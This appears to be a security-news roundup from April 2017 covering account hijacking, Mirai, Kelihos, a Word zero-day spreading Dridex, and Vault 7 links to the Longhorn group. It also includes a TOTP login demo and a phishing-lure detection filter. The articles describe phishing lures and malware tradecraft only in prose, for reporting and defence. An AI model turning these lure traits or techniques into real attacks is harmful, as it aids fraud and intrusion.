The basic password problem was highlighted in a recent study by Thycotic, which found that even security professionals reuse passwords, use weak passwords, and don't change them over long periods of time. A password stolen from Yahoo years ago might well provide access to other accounts today -- including Amazon.

The result, according to the Wall Street Journal, is that some sellers are losing thousands of dollars. "CJ Rosenbaum, a New York-based lawyer who represents Amazon sellers, says that more than a dozen of his clients have recently called to tell him they were hacked, a number of whom lost about half of their monthly sales of $15,000 to $100,000. They are asking Amazon for their money back, Mr. Rosenbaum said."

WSJ also reports that "some sellers say the hacks have shaken their confidence in Amazon's security measures." This isn't entirely fair -- all users should do more to protect their passwords: strong, unique passwords that are regularly changed. And wherever possible, two-factor options should be employed.

"It is critical for Amazon resellers to take advantage of Amazon's two-factor authentication to prevent this type of hijacking and phishing activity," comments Sophos' principal research scientist Chet Wisniewski. "All Amazon users should take advantage of this feature, but considering what third party resellers have at risk it is even more important. The easiest method to enable uses a time-oriented token you can load for free on your Android or iOS smartphone. The most popular app to use for this is Google's Authenticator app." Sophos has its own option that can be installed on Android or iOS and enabled in the Amazon or AWS account.

This is not to say that Amazon could not do more to protect its customers. In the desire to make things as easy as possible for customers, services like Amazon (and including almost all services from other ecommerce sites to social networks) do not enforce good password practices. Two-factor authentication is rarely required, and users are not forced to change passwords regularly. The bottom line, however, is that users need to better understand how to generate strong, unique passwords; and to regularly change them.
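The second-factor check the article recommends, as an added example that is not Amazon's, Sophos' or Google's code: a seller login that requires the password plus an RFC 6238 time-based one-time code (the scheme behind Google Authenticator), so that a password reused from an old breach is not enough on its own. The account store, the salt and the timestamps are constructed for this demonstration.

```python
"""Added example, not Amazon's or Sophos' own code: a seller login that
requires a password plus an RFC 6238 time-based one-time code (the scheme
used by Google Authenticator), so a password reused from an old breach is
not enough by itself. The account store, salt and timestamps are constructed."""
import hashlib
import hmac
import struct
from typing import Optional

STEP = 30           # TOTP time step in seconds
DIGITS = 6          # code length shown by the authenticator app
PBKDF2_ROUNDS = 100_000


def hotp(secret: bytes, counter: int, digits: int = DIGITS) -> str:
    """RFC 4226 HOTP: HMAC-SHA1 over the big-endian counter, dynamic truncation."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def totp(secret: bytes, at: int) -> str:
    """RFC 6238 TOTP: HOTP with the counter derived from Unix time."""
    return hotp(secret, at // STEP)


def verify_totp(secret: bytes, code: str, at: int, window: int = 1) -> bool:
    """Accept the current step and `window` steps either side (phone clock drift)."""
    for skew in range(-window, window + 1):
        if hmac.compare_digest(totp(secret, at + skew * STEP), code):
            return True
    return False


def make_account(password: str, totp_secret: bytes) -> dict:
    """Store a salted PBKDF2 hash, never the password itself.
    The salt is constructed here; real code draws it from os.urandom."""
    salt = b"constructed-salt-0001"
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return {"salt": salt, "pw_hash": digest, "totp_secret": totp_secret}


def login(account: dict, password: str, code: Optional[str], now: int) -> str:
    """Return a verdict string. A stuffed password that passes the first
    check still fails without the code from the seller's authenticator."""
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                    account["salt"], PBKDF2_ROUNDS)
    if not hmac.compare_digest(candidate, account["pw_hash"]):
        return "denied: bad password"
    if code is None or not verify_totp(account["totp_secret"], code, now):
        return "denied: second factor required"
    return "granted"


if __name__ == "__main__":
    # Constructed seller account; the secret is the RFC 6238 test key.
    seller = make_account("Summer2016!", b"12345678901234567890")
    now = 59  # constructed timestamp matching the RFC 6238 test vector
    # Reused password from an old breach, no authenticator code: rejected.
    print(login(seller, "Summer2016!", None, now))
    # Same password plus the code the seller's phone shows right now: accepted.
    print(login(seller, "Summer2016!", totp(seller["totp_secret"], now), now))
```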


OWASP Proposes New Vulnerabilities for 2017 Top 10

11.4.2017 securityweek Vulnerability
OWASP Top 10 - 2017 RC1-English.pdf
The Open Web Application Security Project (OWASP) announced on Monday the first release candidate for the 2017 OWASP Top 10, which proposes two new vulnerability categories.

The new categories proposed for OWASP Top 10 - 2017 are “insufficient attack detection and prevention” and “unprotected APIs.”

OWASP wants to make room for the “unprotected APIs” category by dropping “unvalidated redirects and forwards,” the 10th item on the current (2013) list, which was added to the top 10 in 2010.

The new insufficient attack protection category would be added to the 7th position. OWASP wants to make room for it by merging the current 4th and 7th items, namely insecure direct object references with missing function level access control. The organization has proposed the merger of the two old categories into “broken access control”, as it was back in 2004.

OWASP top 10 2017

OWASP has provided the following description for the insufficient attack protection category: “The majority of applications and APIs lack the basic ability to detect, prevent, and respond to both manual and automated attacks. Attack protection goes far beyond basic input validation and involves automatically detecting, logging, responding, and even blocking exploit attempts. Application owners also need to be able to deploy patches quickly to protect against attacks.”

In a discussion on Reddit, several users said “insufficient attack protection” should not be classified as a flaw. It remains to be seen if enough users agree to make OWASP change its mind about creating a new category for it.

As for the unprotected APIs category, OWASP says, “Modern applications often involve rich client applications and APIs, such as JavaScript in the browser and mobile apps, that connect to an API of some kind (SOAP/XML, REST/JSON, RPC, GWT, etc.). These APIs are often unprotected and contain numerous vulnerabilities.”

Comments on the 2017 Top 10 proposal can be submitted via email until June 30 to OWASP-TopTen(at)lists.owasp.org, or dave.wichers(at)owasp.org (for private comments). The final version will be released in either July or August.


Mirai Variant Has Bitcoin Mining Capabilities

11.4.2017 securityweek IoT
A newly observed variant of the Mirai malware is abusing infected Internet of Things (IoT) devices for Bitcoin crypto-currency mining, IBM X-Force security researchers warn.

Initially spotted in September last year, Mirai was designed to find insecure IoT devices and ensnare them into a botnet primarily used for launching DDoS (distributed denial of service) attacks. Variants of the malware started to emerge after the Trojan’s source code was leaked, and a Windows variant designed to spread the Linux version was spotted earlier this year.

The newest variant moves beyond the initial DDoS capabilities of the botnet, with the addition of a component focused on Bitcoin mining. This crypto-currency has doubled in price over the past half year, trading at more than $1,290 per unit this March, above the November 2013 high of $1,242.

The Bitcoin mining-capable Mirai variant was observed in a short-lived, high-volume campaign at the end of March, targeting Linux machines running BusyBox. The attack focuses on devices such as DVR servers, which usually feature BusyBox with default Telnet credentials that Mirai targets with a dictionary attack brute-force tool.

In addition to the various types of attacks that Mirai bots can perform, such as TCP, UDP, and HTTP floods, the new variant also turns the compromised devices into Bitcoin miner slaves. Because IoT devices usually lack computing power, they can’t create Bitcoins, at least not on their own.

“Given Mirai’s power to infect thousands of machines at a time, however, there is a possibility that the bitcoin miners could work together in tandem as one large miner consortium. We haven’t yet determined that capability, but we found it to be an interesting yet concerning possibility. It’s possible that while the Mirai bots are idle and awaiting further instructions, they could be leveraged to go into mining mode,” IBM explains.

IBM researchers found the Mirai dropper in a web console and associated the site to a series of high-volume command injection attacks. They also determined that the website was used as a malware package archive repository and that it was also counting infected victims in real-time. What’s more, the file package also included a Dofloo backdoor and a Linux shell.

Mirai is only one of the malware families to have adopted crypto-currency mining lately, after the Sundown exploit kit started distributing a Monero miner several months ago. Last year, researchers discovered a Go-based Linux Trojan focused on Monero mining.


Cisco Finds Many Flaws in Moxa Industrial APs

11.4.2017 securityweek Vulnerability
Cisco’s Talos intelligence and research group has conducted a two-week analysis of an industrial wireless access point (AP) from Taiwan-based Moxa and discovered more than a dozen vulnerabilities, including ones that can be exploited to take full control of a device.

A blog post published by Talos on Monday describes the vulnerabilities found by researchers during their tests. All of the flaws have been addressed by Moxa, except for one critical weakness, whose details will not be disclosed until a patch becomes available.

Experts focused on Moxa’s AWK-3131A AP, which is recommended for any type of industrial wireless application.

On the first day of testing, researchers identified the services available on the BusyBox-powered device, including SSH (Dropbear), Telnet, HTTP and HTTPS. Talos said Moxa agreed to share the source code of its BusyBox implementation for proper analysis.

Moxa AP vulnerabilities

Researchers first identified some authentication issues that made it easy for attackers to launch dictionary attacks against the web interface’s login page, and flaws that allowed hackers to hijack user sessions.

On the third day of the investigation, researchers discovered many cross-site scripting (XSS) vulnerabilities in the front-end of the web interface. These flaws can be exploited to hijack user sessions and gain access to the web interface.

Once they are authenticated, attackers can exploit one of the several command injection vulnerabilities in order to gain full control of the targeted AP.

Several of the security holes found by Talos can allow malicious actors to obtain potentially valuable information without any authentication, including passwords, firewall rules and network configuration data.

Experts have also uncovered a denial-of-service (DoS) vulnerability that can be exploited remotely to crash the web application.

On the last day of testing, researchers identified several cryptography-related issues. Specifically, they determined that the Moxa AP used an outdated version of OpenSSL (1.0.0d from 2011), which left it vulnerable to attacks such as POODLE and DROWN.

“Our research demonstrates how many vulnerabilities can be quickly discovered by analyzing a device,” Talos researchers said. “There is nothing to suggest that this device is more or less vulnerable than any other. Indeed, the vulnerabilities we discovered are exactly the types of vulnerabilities likely to be discovered on any ICS device.”


U.S. Takes Down Kelihos Botnet After Its Russian Operator Arrested in Spain
11.4.2017 thehackernews BotNet
A Russian computer hacker arrested over the weekend in Barcelona was apparently detained for his role in a massive computer botnet, and not for last year's US presidential election hack as reported by the Russian media.
Peter Yuryevich Levashov, a 32-year-old Russian computer programmer, is suspected of operating the Kelihos botnet — a global network of over 100,000 infected computers that has been used to deliver spam, steal login passwords, and infect computers with ransomware and other types of malware since approximately 2010, the U.S. Justice Department announced Monday.
As suspected earlier, Levashov, also known as Peter Severa, is the same man who has also been listed in the World's Top 10 Worst Spammers maintained by anti-spam group Spamhaus, which has given him the 7th position in the list.
The arrest was made possible after the FBI learned just last month that Levashov was traveling with his family to Spain from his home in Russia, a country without any extradition treaty to the United States.
Initially, it was believed that Levashov was detained on suspicion of involvement in the 2016 US election hack, after his wife told Russian publication RT that authorities said her husband’s apprehension was in part due to his involvement in the U.S. election hacking, including the notorious breach of the Democratic National Committee (DNC).
However, the DoJ press release indicates no link between Levashov and the US election hack at all.
Instead, Levashov was linked to the Kelihos botnet by the FBI because he used the same IP address to operate the botnet that he used to access his email and other online accounts in his name, including Apple iCloud and Google Gmail accounts.
According to the indictment unsealed Monday, Levashov operated the botnet since 2010, targeting Microsoft Windows machines for infection. He allegedly used Kelihos to distribute hundreds of millions of spam emails per year, and pump-and-dump stock scams.
Besides conducting spamming operations, prosecutors also alleged that Levashov used the Kelihos botnet to infect end-user computers with malware and harvest passwords to online and bank accounts belonging to thousands of Americans.
"The ability of botnets like Kelihos to be weaponized quickly for vast and varied types of harms is a dangerous and deep threat to all Americans, driving at the core of how we communicate, network, earn a living, and live our everyday lives," said Acting Assistant Attorney General Blanco.
"Our success in disrupting the Kelihos botnet was the result of strong cooperation between private industry experts and law enforcement, and the use of innovative legal and technical tactics."
The FBI officials obtained court orders (Rule 41 of the Federal Rules of Criminal Procedure) to redirect Kelihos-infected PCs to servers operated by authorities — a process known as "Sinkhole attack" — and to block any attempts by the botnet to regain control of those sinkholed computers.
The FBI said it worked with security firm CrowdStrike and Shadowserver Foundation, a volunteer group of information security experts, to deploy the sinkhole attack to disconnect communications between criminals and infected computers.
Levashov has been charged with wire fraud and unauthorized interception of electronic communications. The government is now seeking his extradition to the United States.


Unpatched Microsoft Word Flaw is Being Used to Spread Dridex Banking Trojan
11.4.2017 thehackernews Vulnerability
If you are a regular reader of The Hacker News, you might be aware of an ongoing cyber attack — detected in the wild by McAfee and FireEye — that silently installs malware on fully-patched computers by exploiting an unpatched Microsoft Word vulnerability in all current versions of Microsoft Office.
Now, according to security firm Proofpoint, the operators of the Dridex malware started exploiting the unpatched Microsoft Word vulnerability to spread a version of their infamous Dridex banking trojan.
Dridex is currently one of the most dangerous banking trojans on the Internet that exhibits the typical behavior of monitoring a victim's traffic to bank sites by infiltrating PCs and stealing victim's online banking credentials and financial data.
The Dridex actors usually relied on macro-laden Word files to distribute the malware through spam messages or emails.
However, this is the first time researchers have found the Dridex operators using an unpatched zero-day flaw in Microsoft Word to distribute their banking trojan.

According to a blog post published Monday night by Proofpoint, the latest Dridex spam campaign is delivering Word documents weaponized with this zero-day to millions of recipients across several organizations, including banks primarily located in Australia.
"Emails in this campaign used an attached Microsoft Word RTF (Rich Text Format) document. Messages purported to be from "[device]@[recipient's domain]." [Device] may be "copier", "documents", "noreply", "no-reply", or "scanner"," Proofpoint researchers say.
"The subject line in all cases read "Scan Data" and included attachments named "Scan_123456.doc" or "Scan_123456.pdf", where "123456" was replaced with random digits...the spoofed email domains and the common practice of emailing digitized versions of documents make the lures fairly convincing."
As we reported on Saturday, this zero-day flaw is severe because it gives hackers power to bypass most exploit mitigations developed by Microsoft, and unlike past Word exploits seen in the wild, it doesn't require victims to enable Macros.
Moreover, given the danger of the Dridex – also known as Bugat and Cridex – banking trojan, people are strongly advised not to open Word documents attached to an email from anyone, even a known sender, until Microsoft releases a patch.
Microsoft knew of the flaw very long ago
According to researchers at McAfee and FireEye, Microsoft has known of the remote code flaw since January and could release a patch for the vulnerability today, as part of its regular Patch Tuesday routine.
However, independent security researcher Ryan Hanson claimed that he discovered this 0-day, along with two other flaws, in July and reported it to Microsoft in October 2016.
"The initial discovery was in July, which was followed up by additional research and the identification of a protected view bypass vulnerability. Those two bugs and an additional Outlook bug were submitted to MS in October," Hanson told The Hacker News.
"There may very well be additional HTA related vectors in Office, but based on the detail provided by McAfee, the vulnerability they've identified functions exactly like the one I disclosed. The only difference I see is the VBScript payload, since my payload simply executed calc.exe."
If Hanson's claims are true and the vulnerability he reported is the same one being used in the wild to spread Dridex, Microsoft left its customers vulnerable to these attacks even after having known of the critical flaw for quite some time.
Enable 'Protected View' in Microsoft Office to Prevent Attack
Since the attack does not work when a malicious document is viewed in Office Protected View, users are advised to enable this feature in order to view any Office documents.
For more technical details about the latest Dridex malware campaign exploiting the unpatched Microsoft Word flaw, you can head on to the blog post published by Proofpoint.
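The lure pattern described in this write-up and in the earlier Proofpoint summary on this page (spoofed internal device sender, "Scan Data" subject, Scan_<digits>.doc/.pdf attachment carrying RTF content), turned into a mail-gateway check as an added example that is not Proofpoint's or The Hacker News' code. The message records and attachment bytes are constructed for the demonstration; the verdict thresholds are an assumption.

```python
"""Added example, not Proofpoint's or The Hacker News' code: a mail-gateway
check that scores an inbound message against the Dridex lure pattern
(spoofed internal device sender, "Scan Data" subject, Scan_<digits>
attachment, and RTF content under a .doc/.pdf name). Message records and
attachment bytes are constructed for this demonstration."""
import re
from typing import Dict, List

# Lure characteristics reported by Proofpoint for this campaign.
LURE_LOCAL_PARTS = {"copier", "documents", "noreply", "no-reply", "scanner"}
LURE_SUBJECT = "scan data"
LURE_ATTACHMENT = re.compile(r"^scan_\d+\.(doc|pdf)$", re.IGNORECASE)
RTF_MAGIC = b"{\\rtf"  # every RTF file starts with this control word


def split_address(addr: str):
    """Return (local_part, domain), lower-cased; domain is '' if absent."""
    local, _, domain = addr.strip().lower().partition("@")
    return local, domain


def lure_indicators(msg: Dict[str, object]) -> List[str]:
    """List every campaign trait the message exhibits (empty list if none)."""
    reasons: List[str] = []
    sender_local, sender_domain = split_address(str(msg["sender"]))
    _, recipient_domain = split_address(str(msg["recipient"]))
    if sender_local in LURE_LOCAL_PARTS and sender_domain == recipient_domain:
        reasons.append("sender spoofs an internal device address")
    if str(msg["subject"]).strip().lower() == LURE_SUBJECT:
        reasons.append("subject matches campaign lure")
    name = str(msg["attachment_name"])
    if LURE_ATTACHMENT.match(name):
        reasons.append("attachment name matches Scan_<digits>.doc/.pdf")
    head = bytes(msg["attachment_head"])
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    if ext in ("doc", "pdf") and head.startswith(RTF_MAGIC):
        # The exploit rides in an RTF; a .doc or .pdf name on RTF content is
        # the carrier Proofpoint describes, not what a scanner produces.
        reasons.append(f"RTF content disguised as .{ext}")
    return reasons


def verdict(msg: Dict[str, object]) -> str:
    """block: disguised RTF; review: two or more lure traits; allow otherwise.
    Thresholds are an assumption for this example, not a Proofpoint rule."""
    reasons = lure_indicators(msg)
    if any(r.startswith("RTF content disguised") for r in reasons):
        return "block"
    if len(reasons) >= 2:
        return "review"
    return "allow"


# Constructed sample messages (no real campaign artefacts).
MSG_LURE = {"sender": "scanner@example.com", "recipient": "alice@example.com",
            "subject": "Scan Data", "attachment_name": "Scan_482913.doc",
            "attachment_head": b"{\\rtf1\\ansi\\deff0"}
MSG_REAL_SCANNER = {"sender": "scanner@example.com", "recipient": "alice@example.com",
                    "subject": "Scan Data", "attachment_name": "Scan_000123.pdf",
                    "attachment_head": b"%PDF-1.4"}
MSG_CLEAN = {"sender": "bob@partner.org", "recipient": "alice@example.com",
             "subject": "Q2 report", "attachment_name": "report.docx",
             "attachment_head": b"PK\x03\x04"}

if __name__ == "__main__":
    for label, msg in (("lure", MSG_LURE), ("real scanner", MSG_REAL_SCANNER),
                       ("clean", MSG_CLEAN)):
        print(f"{label:13s} -> {verdict(msg):6s} {lure_indicators(msg)}")
```

A genuine scanner message lands in "review" rather than "block" because only the content check separates it from the lure; pair this with Protected View on the endpoint as the article advises.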


WikiLeaks CIA Files Linked to Espionage Group

11.4.2017 securityweek  BigBrothers

Researchers at Symantec have analyzed the Vault 7 files published in recent weeks by WikiLeaks and determined that they are very similar to ones used by a cyberespionage group tracked by the security firm as “Longhorn.”

The Vault 7 leaks cover exploits and tools allegedly used by the U.S. Central Intelligence Agency (CIA) to hack a wide range of systems, including PCs, Macs, mobile devices and IoT products. Based on an analysis of the files, Symantec is fairly confident that some of the Vault 7 documents describe the tools and techniques used by Longhorn.

According to the security firm, Longhorn is a threat group that has been around since at least 2011, but possibly as early as 2007. Symantec has been tracking the APT since 2014, when it used a Windows zero-day exploit (CVE-2014-4148) to deliver a backdoor called Plexor.

Researchers have observed Longhorn attacks aimed at more than 40 targets across 16 different countries in Europe, Asia (Middle East and other regions) and Africa. The list of targets includes governments, international organizations, and companies in the telecoms, financial, aerospace, energy, IT, education, and natural resources sectors. Symantec pointed out that all of the targeted entities could present an interest to a nation-state actor.

An analysis of Longhorn’s tools and working hours suggests that the group is located in North America and its members are English speakers.

The CIA has neither confirmed nor denied that the Vault 7 files are authentic. The agency said its mission is to collect foreign intelligence from overseas entities, and pointed out that it is legally prohibited from spying on Americans.

Symantec noted that it did detect one Longhorn malware infection in the United States, but an uninstaller was launched within hours, which could indicate that the computer had been infected unintentionally.

In addition to Plexor, Longhorn has used several other pieces of malware in its operations, including Trojans dubbed Corentry, LH1 and LH2.

Corentry’s development timeline coincides with the dates mentioned in a changelog file published by WikiLeaks for a tool called Fluxwire. Experts also determined that the Plexor backdoor is very similar to a tool named “Fire and Forget” in the Vault 7 documents.

Researchers also found similarities between the cryptographic protocols described in the Vault 7 files and the ones used by Longhorn.

“Other Vault 7 documents outline tradecraft practices to be used, such as use of the Real-time Transport Protocol (RTP) as a means of command and control (C&C) communications, employing wipe-on-use as standard practice, in-memory string de-obfuscation, using a unique deployment-time key for string obfuscation, and the use of secure erase protocols involving renaming and overwriting. Symantec has observed Longhorn tools following all of these practices,” the security firm said in a blog post.

If confirmed, Longhorn would be the second cyber espionage group whose activities have been tied to the U.S. government. The first was the NSA-linked Equation Group, whose mistakes were analyzed by the individuals who developed the Vault 7 tools.


Symantec confirms that Longhorn group is tied to CIA operators detailed in Vault 7
11.4.2017 securityaffairs BigBrothers

Symantec reportedly linked the CIA hacking tools to several cyber attacks launched over the years by the Longhorn group.
Security experts who analyzed the alleged CIA hacking tools included in the Vault 7 dump found that they have been used against at least 40 governments and private organizations across 16 countries.
Researchers at security firm Symantec reportedly linked the CIA hacking tools to a number of cyber attacks launched in recent years by a threat actor the company identified as the Longhorn group.

“Spying tools and operational protocols detailed in the recent Vault 7 leak have been used in cyberattacks against at least 40 targets in 16 different countries by a group Symantec calls Longhorn. Symantec has been protecting its customers from Longhorn’s tools for the past three years and has continued to track the group in order to learn more about its tools, tactics, and procedures.” reads the analysis published by Symantec.

“The tools used by Longhorn closely follow development timelines and technical specifications laid out in documents disclosed by WikiLeaks.”

Symantec believes Longhorn is a North American hacking group that has been active since at least 2011. The group is very sophisticated and has used zero-day exploits and complex malware to conduct targeted attacks against governments and organizations in almost every industry, including financial, energy, telecommunications, education and aerospace.

The Longhorn group is a well-resourced hacking team that operated on a standard Monday to Friday working week in an American time zone. The nature of the targets and its Tactics, Techniques, and Procedures (TTPs) suggest the Longhorn group is a state-sponsored crew.

The targets were all located in the Middle East, Europe, Asia, and Africa. In one case, the researchers observed the Longhorn group compromising a computer in the US; following infection, an uninstaller was quickly executed, which indicates that this victim was infected unintentionally.

“The Longhorn group shares some of the same cryptographic protocols specified in the Vault 7 documents, in addition to following leaked guidelines on tactics to avoid detection. Given the close similarities between the tools and techniques, there can be little doubt that Longhorn’s activities and the Vault 7 documents are the work of the same group.” continues Symantec.

Digging into the Vault 7 archive, the experts found documents describing the Fluxwire cyber espionage malware. They include a changelog of the dates on which new features were added to the malicious code, and both the features and the timeline are consistent with the development cycle of the Corentry malware created by the Longhorn APT.
“These dates align closely with the development of one Longhorn tool (Trojan.Corentry) tracked by Symantec. New features in Corentry consistently appeared in samples obtained by Symantec either on the same date listed in the Vault 7 document or several days later, leaving little doubt that Corentry is the malware described in the leaked document.” reads Symantec.

“Early versions of Corentry seen by Symantec contained a reference to the file path for the Fluxwire program database (PDB) file. The Vault 7 document lists removal of the full path for the PDB as one of the changes implemented in Version 3.5.0.”

Longhorn group

“Up until 2014, versions of Corentry were compiled using GCC [GNU Compiler Collection]. According to the Vault 7 document, Fluxwire switched to an MSVC compiler for version 3.3.0 on February 25, 2015. This was reflected in samples of Corentry, where a version compiled on February 25, 2015, had used MSVC as a compiler.”

A second document in the Vault 7 archive details Fire and Forget, a specification for user-mode injection of a payload by a tool called Archangel.

The specification of the malicious code and the interface used to load it matches the Longhorn tool called Backdoor.Plexor.

The experts discovered many other similarities. Another leaked CIA document outlined cryptographic protocols that should be implemented in malware development.
“A third document outlines cryptographic protocols that malware tools should follow. These include the use of inner cryptography within SSL to prevent man-in-the-middle (MITM) attacks, key exchange once per connection, and use of AES with a 32-bit key. These requirements align with the cryptographic practices observed by Symantec in all of the Longhorn tools.” continues Symantec.

Another Vault 7 document recommends the use of in-memory string de-obfuscation and of the Real-time Transport Protocol (RTP) for communicating with the command and control (C&C) servers.

All the above techniques and protocols were implemented in all the hacking tools of the Longhorn group.

Researchers from Symantec discovered a number of indicators that confirm Longhorn was from an English-speaking, North American country.

“The acronym MTWRFSU (Monday Tuesday Wednesday ThuRsday Friday Saturday SUnday) was used to configure which day of the week malware would communicate with the attackers. This acronym is common in academic calendars in North America.” reads Symantec. “Some of the code words found in the malware, such as SCOOBYSNACK, would be most familiar in North America. In addition to this, the compilation times of tools with reliable timestamps indicate a time zone in the Americas.”

In summary, there is no doubt that the Longhorn group has the same capabilities and hacking tools as the CIA operators documented in the Vault 7 files.


Symantec Connects 40 Cyber Attacks to CIA Hacking Tools Exposed by Wikileaks
11.4.2017 thehackernews BigBrothers
Security researchers have confirmed that the alleged CIA hacking tools recently exposed by WikiLeaks have been used against at least 40 governments and private organizations across 16 countries.
Since March, as part of its "Vault 7" series, Wikileaks has published over 8,761 documents and other confidential information that the whistleblower group claims came from the US Central Intelligence Agency (CIA).
Now, researchers at cybersecurity company Symantec reportedly managed to link those CIA hacking tools to numerous real cyber attacks in recent years that have been carried out against the government and private sectors across the world.
Those 40 cyber attacks were conducted by Longhorn — a North American hacking group that has been active since at least 2011 and has used backdoor trojans and zero-day attacks to target government, financial, energy, telecommunications, education, aerospace, and natural resources sectors.
Although the group's targets were all in the Middle East, Europe, Asia, and Africa, researchers said the group once infected a computer in the United States, but an uninstaller was launched within an hour, which indicates the "victim was infected unintentionally."
What's interesting is that Symantec linked some of the CIA hacking tools and malware variants disclosed by Wikileaks in the Vault 7 files to Longhorn cyber espionage operations.
Fluxwire (Created by CIA) ≅ Corentry (Created by Longhorn)
Fluxwire, a cyber espionage malware allegedly created by the CIA and mentioned in the Vault 7 documents, comes with a changelog of the dates on which new features were added, which according to Symantec closely resembles the development cycle of "Corentry," a malware created by the Longhorn hacking group.
"Early versions of Corentry seen by Symantec contained a reference to the file path for the Fluxwire program database (PDB) file," Symantec explains. "The Vault 7 document lists removal of the full path for the PDB as one of the changes implemented in Version 3.5.0."
"Up until 2014, versions of Corentry were compiled using GCC [GNU Compiler Collection]. According to the Vault 7 document, Fluxwire switched to an MSVC compiler for version 3.3.0 on February 25, 2015. This was reflected in samples of Corentry, where a version compiled on February 25, 2015, had used MSVC as a compiler."
Similar Malware Modules
Another Vault 7 document details the 'Fire and Forget' specification of the payload and a malware module loader called Archangel, which, Symantec claims, match almost perfectly a Longhorn backdoor called Plexor.
"The specification of the payload and the interface used to load it was closely matched in another Longhorn tool called Backdoor.Plexor," says Symantec.
Use of Similar Cryptographic Protocol Practices
Another leaked CIA document outlined cryptographic protocols that should be used within malware tools, such as using AES encryption with a 32-bit key, inner cryptography within SSL to prevent man-in-the-middle attacks, and key exchanges once per connection.
One leaked CIA document also recommends the use of in-memory string de-obfuscation and of the Real-time Transport Protocol (RTP) for communicating with the command and control (C&C) servers.
According to Symantec, these cryptographic protocol and communication practices were also used by the Longhorn group in all of its hacking tools.
More About LongHorn Hacking Group
Longhorn has been described as a well-resourced hacking group that works on a standard Monday to Friday working week — likely a behavior of a state-sponsored group — and operates in an American time zone.
Longhorn's advanced malware tools are specially designed for cyber espionage with detailed system fingerprinting, discovery, and exfiltration capabilities. The group uses extremely stealthy capabilities in its malware to avoid detection.
Symantec's analysis of the group's activities also shows that Longhorn is from an English-speaking North American country, based on the code words it uses, which reference the band The Police (REDLIGHT and ROXANNE) and include colloquial terms like "scoobysnack."
Overall, the functionality described in the CIA documents and its links to the group activities leave "little doubt that Longhorn's activities and the Vault 7 documents are the work of the same group."


US Takes Down Huge Botnet as Spain Arrests Notorious Russian Hacker

11.4.2017 securityweek BotNet
U.S. Authorities Take Down Kelihos Botnet as Alleged Creator is Arrested in Spain

US authorities moved Monday to take down a global computer botnet behind the massive theft of personal data and unwanted spam emails, as Spain arrested the notorious Russian hacker who operated it.

US authorities say the Russian, Piotr or Peter Levashov, had operated the Kelihos network of tens of thousands of infected computers, stealing personal data and renting the network out to others to send spam emails by the millions and extort ransom from computer owners.

Levashov, also known in the hacking world as Peter Severa, was arrested at Barcelona airport on Friday at the US request.

A Spanish judge on Monday ordered him to be remanded in custody as Washington is expected to seek his extradition.

Spanish police said in a statement late Monday that the arrest was the result of a "complex inquiry carried out in collaboration with the American FBI."

A US indictment unsealed Monday said Levashov, 36 and a native of St. Petersburg, had operated the Kelihos botnet since around 2010.

It was not the first time US officials have gone after him. In 2008 he was indicted as a Russia-based partner of the leading US spammer, Alan Ralsky. Ralsky and others were jailed in that case but Levashov was never caught.

100,000 computers infected

The Kelihos network is made up of private computers around the world running the Microsoft Windows operating system. The computers are infected with malware that gives Levashov the ability to control them remotely, with the owners completely unaware.

According to the Justice Department, at times the number of computers in the network has topped 100,000, with between five and 10 percent of them in the United States.

Through underground networks, the botnet's services were sold to others, who would use it to send out spam emails advertising counterfeit drugs, work-at-home scams, and other fraud schemes, the indictment said.

They were also used for illegal "pump-and-dump" stock market manipulation schemes, and to spread other malware through which hackers could steal a user's banking account information including passwords, and lock up a computer's information to demand huge ransoms.

The indictment called Levashov "one of the world's most notorious criminal spammers."

The Spamhaus Project, which documents spam, botnets, malware and other abuse, listed him as seventh on its "10 Worst Spammers" list and "one of the longest operating criminal spam-lords on the internet."

"The ability of botnets like Kelihos to be weaponized quickly for vast and varied types of harms is a dangerous and deep threat to all Americans, driving at the core of how we communicate, network, earn a living, and live our everyday lives," said Acting US Assistant Attorney General Kenneth Blanco in a statement.

Using legal 'malware' against botnet

Levashov's arrest was unrelated to investigations into Russian interference in last year's US presidential election, US officials said.

Earlier, the suspect's wife had told Russia Today that his arrest was connected to the election hacking case.

A Spanish court specializing in international cases will rule on whether he will be sent to the US.

The US has 40 days to present evidence backing Levashov's extradition, which the suspect opposes.

In parallel with the arrest, US justice authorities announced an extraordinary move to bring down the Kelihos network, obtaining warrants that allow them to install their own malware-like programs on computers in the network to intercept its operation.

Such a move appeared to be the first ever application of controversial new investigative powers which took effect late last year.

The Justice Department explained that its programs would be able to redirect Kelihos-infected computers into substitute servers in order to halt the network's operation.

In doing so, it can record the private IP or internet protocol addresses of the computers and provide them to internet service providers to help customers eliminate the infections, the department explained.

In a warrant that permitted investigators to "infect" botnet computers in order to block Kelihos, investigators pledged to guard the privacy of computer owners.

"This operation will not capture content from the target computers or modify them in any other capacity except limiting the target computers' ability to interact with the Kelihos botnet," the warrant said.


Hackers Steal Customer Card Data From GameStop

11.4.2017 securityweek Crime 
Video gaming retail company GameStop appears to have been breached, with an unknown number of customers' payment card details stolen.

Those details are thought to include customer card number, expiration date, name, address and card verification value (CVV2), usually a 3-digit security code printed on the back of the card.

The breach is thought to affect only online customers of the website GameStop.com, without affecting any of GameStop's high street stores.

The breach was first reported by KrebsOnSecurity on Friday. Krebs blogged about the incident and also contacted GameStop, which immediately acknowledged the breach.

Two sources in the finance industry told Krebs they had received reports from a credit card processor indicating that GameStop had probably been compromised between September 2016 and February 2017. The credit card processor will undoubtedly have informed GameStop; but the brevity of the 'security update' on the GameStop website suggests it has only recently become aware of the breach.

"GameStop recently received notification from a third party," says the statement, "that it believed payment card data from cards used on the GameStop.com website was being offered for sale on a website. That day a leading security firm was engaged to investigate these claims. GameStop has and will continue to work non-stop to address this report and take appropriate measures to eradicate any issue that may be identified."

Noticeably for a company that has lost customer data, there is no offer of free credit monitoring for those affected -- just the statement, "GameStop would like to remind its customers that it is always advisable to monitor payment card account statements for unauthorized charges." Hopefully, that simply means that GameStop doesn't yet know which or how many of its customers were compromised.

What isn't yet clear is the extent of the breach. It is assumed that malware intercepted the card details before they were encrypted onsite. This assumption is based on the belief that the CVV2 code was also stolen. Since companies are not supposed to store this code, it is assumed the malware stole the details before it was discarded.

